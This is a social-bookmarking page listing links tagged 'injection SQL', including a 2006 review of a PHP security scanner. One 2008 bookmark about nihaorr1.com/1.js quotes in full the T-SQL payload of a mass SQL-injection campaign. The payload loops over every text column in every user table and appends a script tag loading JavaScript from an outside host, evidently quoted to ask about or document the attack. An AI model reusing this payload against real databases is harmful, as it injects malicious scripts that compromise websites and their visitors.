PUBLIC   marks

PUBLIC MARKS with tag "injection SQL"

Sponsorised links

April 2008

Anyone know about www.nihaorr1.com/1.js? - IIS.net

by night.kame (via)

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=rtrim(convert(varchar'[' @C '])) ''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Avec SQL Server, la vie est plus simple.

May 2007

September 2006

Nexen.net : portail PHP et MySQL - Chorizo scanner : revue

by dzc & 1 other
Chorizo Scanner est un nouveau service en ligne pour améliorer la sécurité des applications PHP. Il effectue des tests automatiques pour les vulnérabilités les plus courantes, et permet de rapporter rapidement les erreurs de validations les plus courantes.

PUBLIC TAGS related to tag "injection SQL"

no tag

Sponsorised links